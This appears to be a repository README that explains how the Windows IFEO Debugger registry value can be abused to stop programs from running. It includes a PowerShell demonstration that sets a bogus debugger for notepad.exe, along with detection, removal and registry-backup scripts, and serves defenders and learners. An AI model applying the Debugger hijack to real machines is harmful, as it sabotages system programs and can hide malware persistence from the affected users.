BlindEyeSoftworks / IFEO-Exploit-Payload-Sample

An in-depth look at a malicious payload using Windows Image File Execution Options (IFEO) as an attack vector for executing Denial of Service (DoS) attacks on system programs.

IFEO Exploit Payload Sample

Analysis:

Windows lets power users attach a debugger to a program automatically, every time it is launched, through Image File Execution Options (IFEO), a long-standing registry feature of the Windows NT family that is present in Windows 2000 and every later release. The Debugger hook lives in user mode, in the CreateProcess path (CreateProcessInternalW in kernel32/kernelbase), not in the kernel's undocumented NtCreateUserProcess. Before it hands the image to NtCreateUserProcess, CreateProcess works out what kind of image it has been asked to run (MS-DOS, Windows 3.1 or a native Windows executable) and looks in the local machine hive for an IFEO subkey named after the image's file name and extension, for example notepad.exe. If that subkey holds a string value named Debugger, CreateProcess prepends the value to the original command line and restarts process creation with the debugger as the image to execute; the debugger receives the original command line as its arguments and is expected to start the requested program itself. Anything that cannot be launched, or that never starts the original program, therefore stops that program from running at all. Using tools shipped with Windows such as the Registry Editor, Command Prompt or PowerShell, users may browse the IFEO key, which contains one subkey per executable image name.

IFEO Subkey Path:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

Visual inspection of the IFEO subkey.

By creating a subkey named after the program (or opening one that already exists), a string value named Debugger can be added to it and its data set to the path of a debugger.

Creating the Debugger value.

Alongside its legitimate uses, IFEO is an attack vector for malware, ransomware included, to deny service to both installed and core system programs: pointing Debugger at a file that does not exist, or at a program that never launches its arguments, stops the targeted executable from ever starting. Threat actors can also register their own payload in place of a debugger so that it runs whenever a common program is launched, which makes removal difficult, can trick victims into granting the payload elevated privileges along with the program they meant to run, and helps avoid detection because the hijacked program is the visible launch. Aimed at core system programs, the same trick leaves Windows unstable or inoperable. MITRE ATT&CK catalogues the technique as T1546.012 (Event Triggered Execution: Image File Execution Options Injection). Modifying the IFEO key requires write access to the HKLM hive, so a threat actor must already hold an administrator's access token, obtained through another vector such as social engineering or a User Account Control (UAC) bypass. At that point the threat actor already has full control of the victim's system, which is why IFEO abuse is a persistence and sabotage technique rather than a way to gain privilege.

The Debugger string value.
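The procedure from the preceding sections, as an added PowerShell example that is not part of the original repository's C# payload: one helper creates the program subkey and its Debugger value, the other reverts it, and both are exercised against notepad.exe in a lab, first with a real debugger and then with the non-existent path that produces the denial of service. The helper names, the WinDbg path and the bogus path are this example's own assumptions. The session must be elevated because the key lives under HKLM, and the target must never be a tool you need in order to undo the change (regedit.exe, cmd.exe, powershell.exe).

```powershell
# Added example, not code from the original repository. Run in an elevated
# PowerShell session on a lab machine.

$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

function Set-IfeoDebugger {
    # Creates <IfeoRoot>\<Image> if needed and writes the REG_SZ value "Debugger".
    # $Image is the bare file name CreateProcess matches on (notepad.exe), not a path.
    param(
        [Parameter(Mandatory)][string]$Image,
        [Parameter(Mandatory)][string]$Debugger
    )
    $key = Join-Path $IfeoRoot $Image
    if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name 'Debugger' -Value $Debugger -PropertyType String -Force | Out-Null
}

function Remove-IfeoDebugger {
    # Deletes the Debugger value; drops the subkey only if nothing else is stored in it,
    # so unrelated IFEO settings (GlobalFlag, MitigationOptions, ...) survive.
    param([Parameter(Mandatory)][string]$Image)
    $key = Join-Path $IfeoRoot $Image
    if (-not (Test-Path -LiteralPath $key)) { return }
    Remove-ItemProperty -Path $key -Name 'Debugger' -ErrorAction SilentlyContinue
    $k = Get-Item -LiteralPath $key
    if ($k.ValueCount -eq 0 -and $k.SubKeyCount -eq 0) { Remove-Item -LiteralPath $key }
}

# 1) Legitimate use: every launch of notepad.exe now starts under WinDbg, which
#    receives "notepad.exe <original arguments>" as its own command line.
#    (Debugger path assumed; adjust to the debugger actually installed.)
Set-IfeoDebugger -Image 'notepad.exe' -Debugger '"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe"'

# 2) Denial of service as described above: the "debugger" does not exist, so
#    CreateProcess fails before notepad.exe is ever considered. The failure
#    surfaces here as a terminating error instead of a Notepad window.
Set-IfeoDebugger -Image 'notepad.exe' -Debugger 'C:\does\not\exist\deny.exe'
try {
    Start-Process -FilePath 'notepad.exe' -ErrorAction Stop
} catch {
    Write-Host "Launch blocked by IFEO: $($_.Exception.Message)"
}

# 3) Revert, then confirm Notepad launches normally again.
Remove-IfeoDebugger -Image 'notepad.exe'
Start-Process -FilePath 'notepad.exe'
```

Step 2 is the whole attack: no code runs, no file is dropped, and the only artefact is one REG_SZ value, which is why detection has to look at the registry rather than at the process tree.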

Reversing Modifications:

If the victim can still write to the HKLM registry hive, the modifications are easily reversed: delete the Debugger value (or the whole program subkey) with the Registry Editor, reg.exe or PowerShell, bearing in mind that the attacker may have hijacked those tools as well, in which case use whichever one still launches or start it from the Windows Recovery Environment. If the system cannot be accessed at all, copy the SOFTWARE hive file (%WINDIR%\System32\config\SOFTWARE on the victim's disk) and load it on a separate system to reverse the modifications offline.

In the Registry Editor's tree view, select the hive the file should be mounted under (HKEY_LOCAL_MACHINE or HKEY_USERS); Load Hive... is only enabled while one of these two is selected.

Debugger Select Target Hive

From the menu strip, go to File > Load Hive...

Load HKLM Hive

From here, a Windows Explorer dialog is presented for selecting the hive file from any disk location, after which the Registry Editor asks for a key name under which the hive is mounted. Reverse the IFEO modifications under that key, then select it and use File > Unload Hive... so the changes are written back before the file is returned to the victim's system. The backup copies of these hive files that Windows can keep are covered below.
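The two recovery paths above (live hive, and a hive file loaded on another machine), as an added PowerShell example that is not part of the original repository: Get-IfeoDebuggerEntry lists every IFEO subkey carrying a Debugger value and records whether the image it names can be resolved; entries whose debugger cannot be found are the denial-of-service form and are removed outright, the rest are left for a human to judge, since a developer's WinDbg entry looks identical to an attacker's. The helper names, the D:\ path of the copied hive and the temporary mount name OfflineSoftware are assumptions for this example. Run elevated.

```powershell
# Added example, not code from the original repository. Run elevated.

$LiveIfeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

function Get-IfeoDebuggerEntry {
    # Enumerates <IfeoRoot>\* and returns one record per subkey that has a Debugger value.
    # DebuggerExe is the first token of that value (quoted or not), i.e. the image
    # CreateProcess will actually try to start; Resolvable says whether that image
    # exists as a file or on PATH *on the machine running this script*.
    param([string]$IfeoRoot = $LiveIfeo)
    foreach ($sub in Get-ChildItem -Path $IfeoRoot) {
        $dbg = (Get-ItemProperty -Path $sub.PSPath -Name 'Debugger' -ErrorAction SilentlyContinue).Debugger
        if (-not $dbg) { continue }
        $exe = if ($dbg -match '^\s*"([^"]+)"') { $Matches[1] } else { ($dbg.Trim() -split '\s+')[0] }
        [pscustomobject]@{
            Image       = $sub.PSChildName
            Debugger    = $dbg
            DebuggerExe = $exe
            Resolvable  = [bool](Get-Command -Name $exe -CommandType Application -ErrorAction SilentlyContinue)
            Key         = $sub.PSPath
        }
    }
}

function Remove-IfeoDebuggerEntry {
    # Deletes the Debugger value of each piped record, and the subkey itself only when
    # it holds nothing else, so legitimate GlobalFlag/MitigationOptions data is kept.
    param([Parameter(Mandatory, ValueFromPipeline)][pscustomobject]$Entry)
    process {
        Remove-ItemProperty -Path $Entry.Key -Name 'Debugger'
        $k = Get-Item -Path $Entry.Key
        if ($k.ValueCount -eq 0 -and $k.SubKeyCount -eq 0) { Remove-Item -Path $Entry.Key }
        Write-Host "Reverted IFEO Debugger for $($Entry.Image) (was: $($Entry.Debugger))"
    }
}

# --- Live system: show everything, auto-revert only unresolvable debuggers ---
$entries = @(Get-IfeoDebuggerEntry)
$entries | Format-Table Image, Resolvable, Debugger -AutoSize
$entries | Where-Object { -not $_.Resolvable } | Remove-IfeoDebuggerEntry

# --- Offline: SOFTWARE hive copied from the victim's %WINDIR%\System32\config ---
# reg.exe does the mounting because the PowerShell registry provider cannot load
# hive files itself. Resolvable is judged against *this* machine, so treat every
# listed entry as a suspect and pipe the chosen ones to Remove-IfeoDebuggerEntry
# yourself; the edits are written back to the file on unload.
$hiveFile = 'D:\victim\config\SOFTWARE'
reg.exe load 'HKLM\OfflineSoftware' $hiveFile | Out-Null
try {
    Get-IfeoDebuggerEntry -IfeoRoot 'HKLM:\OfflineSoftware\Microsoft\Windows NT\CurrentVersion\Image File Execution Options' |
        Format-Table Image, Resolvable, Debugger -AutoSize
} finally {
    [System.GC]::Collect()          # drop provider handles so the unload succeeds
    reg.exe unload 'HKLM\OfflineSoftware' | Out-Null
}
```

The same listing doubles as a detection baseline: on a workstation without developer tooling the expected number of Debugger values is zero, so any entry at all is worth an alert, not only the unresolvable ones.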

Mitigation:

User awareness is the first line of defence against threat actors executing malicious tasks on a system, but it cannot be relied on alone, hence antivirus (AV) software and firewalls. Although attacks of this kind are not common and current-generation AV software and groups such as Microsoft Security Intelligence detect known samples, steps should be taken both to prevent an attack and to recover from one: keep AV definitions current and take regular registry backups. Windows 10 version 1709 and earlier automatically back up the registry hive files to %WINDIR%\System32\config\RegBack. Starting with Windows 10 version 1803, Microsoft deliberately disabled these automatic backups by default to reduce the disk footprint of Windows; the RegBack folder still exists, but the hive files in it are 0 KB placeholders. Setting one flag in the HKLM hive restores the feature, which is recommended for reasons beyond the scope of this document.

Enabling automatic registry hive file backups requires modifying the Configuration Manager subkey: HKLM\System\CurrentControlSet\Control\Session Manager\Configuration Manager

This subkey contains a 32-bit integer (REG_DWORD) value named EnablePeriodicBackup. Setting it to 1 enables registry hive file backups on the backup task's schedule.

Configuration Manager subkey.

If this subkey and/or value does not exist, it is safe to create them manually. Once enabled, copy the registry hive file backups to a separate location, because a threat actor with administrative rights can still purge the RegBack folder.

If Windows still does not create registry hive file backups automatically after the above value is set, the Registry Idle Backup task (named RegIdleBackup, described in Task Scheduler as "Registry Idle Backup Task") must be enabled and configured via Windows Task Scheduler. The task is located under Task Scheduler Library\Microsoft\Windows\Registry.

Configuring the Registry Idle Backup Task.
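The backup settings above, as an added PowerShell example that is not part of the original repository: it sets EnablePeriodicBackup, enables and triggers the RegIdleBackup task, checks that RegBack no longer holds 0 KB placeholder files, and copies the hives off-box. The destination E:\RegistryBackups and the 30-second wait are assumptions for this example. Run elevated.

```powershell
# Added example, not code from the original repository. Run elevated.

$CmKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Configuration Manager'
$RegBack  = Join-Path $env:WINDIR 'System32\config\RegBack'
$TaskPath = '\Microsoft\Windows\Registry\'
$TaskName = 'RegIdleBackup'   # shown in Task Scheduler as "Registry Idle Backup Task"

function Enable-RegistryBackup {
    # REG_DWORD EnablePeriodicBackup = 1; the key and value may both be missing on 1803+.
    if (-not (Test-Path -LiteralPath $CmKey)) { New-Item -Path $CmKey -Force | Out-Null }
    New-ItemProperty -Path $CmKey -Name 'EnablePeriodicBackup' -Value 1 -PropertyType DWord -Force | Out-Null

    # The task is what actually writes RegBack; make sure it is enabled and run it now
    # instead of waiting for the next idle window.
    $task = Get-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName
    if ($task.State -eq 'Disabled') { $task | Enable-ScheduledTask | Out-Null }
    Start-ScheduledTask -TaskPath $TaskPath -TaskName $TaskName
}

function Test-RegistryBackup {
    # On builds where the feature is off, RegBack still contains the hive names as
    # 0 KB files, so non-empty files are the success signal.
    $files = @(Get-ChildItem -LiteralPath $RegBack -File)
    $empty = @($files | Where-Object Length -eq 0)
    foreach ($f in $empty) { Write-Warning "Backup still empty: $($f.Name)" }
    return ($files.Count -gt 0 -and $empty.Count -eq 0)
}

function Copy-RegistryBackup {
    # Copy the hives somewhere an attacker holding HKLM cannot simply purge,
    # e.g. removable media or a share with write-once retention (path assumed).
    param([string]$Destination = 'E:\RegistryBackups')
    $dest = Join-Path $Destination (Get-Date -Format 'yyyyMMdd-HHmmss')
    New-Item -ItemType Directory -Path $dest -Force | Out-Null
    Copy-Item -Path (Join-Path $RegBack '*') -Destination $dest
    Get-ChildItem -LiteralPath $dest | Select-Object Name, Length
}

Enable-RegistryBackup
Start-Sleep -Seconds 30          # give the task time to finish writing
if (Test-RegistryBackup) {
    Copy-RegistryBackup
} else {
    Write-Warning 'RegBack not populated yet; re-run Test-RegistryBackup later.'
}
```

Schedule Copy-RegistryBackup itself (or run it from the backup host by pulling the files) so that the off-box copy does not depend on the same machine the attacker controls.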

It is also worth noting that the simplest form of the attack would be removed if CreateProcess fell back to running the requested program when the configured debugger cannot be found, and that the whole vector could be closed if IFEO were gated behind Windows Developer Mode with the user required to re-authenticate when enabling it. Microsoft, even today, does not consider this behaviour a vulnerability: because writing the Debugger value already requires administrative rights, the change does not cross any of the security boundaries Microsoft commits to servicing in its Security Servicing Criteria for Windows, and behaviour that has survived this long is unlikely to be changed. Though Microsoft may not deem the flaw a vulnerability, the National Information Assurance Training and Education Center (NIATEC) says otherwise.

License: MIT License


Languages

Language: C# 100.0%